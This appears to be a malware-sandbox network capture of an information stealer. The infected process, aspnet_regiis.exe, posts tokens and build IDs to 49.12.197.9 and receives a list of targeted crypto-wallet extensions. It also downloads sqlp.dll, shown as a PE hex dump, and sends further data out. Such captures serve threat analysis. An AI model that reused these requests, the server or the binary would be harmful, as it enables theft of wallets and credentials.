                                                                                                                          2024-10-03 01:26:48 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.75795149.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:49 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 332
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:49 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IJDHDGDAAAAKFIDGHJDGCont
                                                                                                                          2024-10-03 01:26:49 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:49 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.75795249.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:50 UTC277OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 6965
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:50 UTC6965OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IDAKJKEHDBGHIDHIEHDBCont
                                                                                                                          2024-10-03 01:26:51 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:51 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.75795349.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:51 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:52 UTC263INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:51 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2459136
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:26:51 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:26:52 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                          Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                          Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                          Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                          Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                          Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                          Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                          Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                          2024-10-03 01:26:52 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.75795449.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:54 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 829
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:54 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------AFHIEBKKFHIEGCAKECGHCont
                                                                                                                          2024-10-03 01:26:55 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.75795549.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:55 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 437
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:55 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------DHJDAKEGDBFHCAAKJJJDCont
                                                                                                                          2024-10-03 01:26:56 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:56 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.75795649.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:57 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 437
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
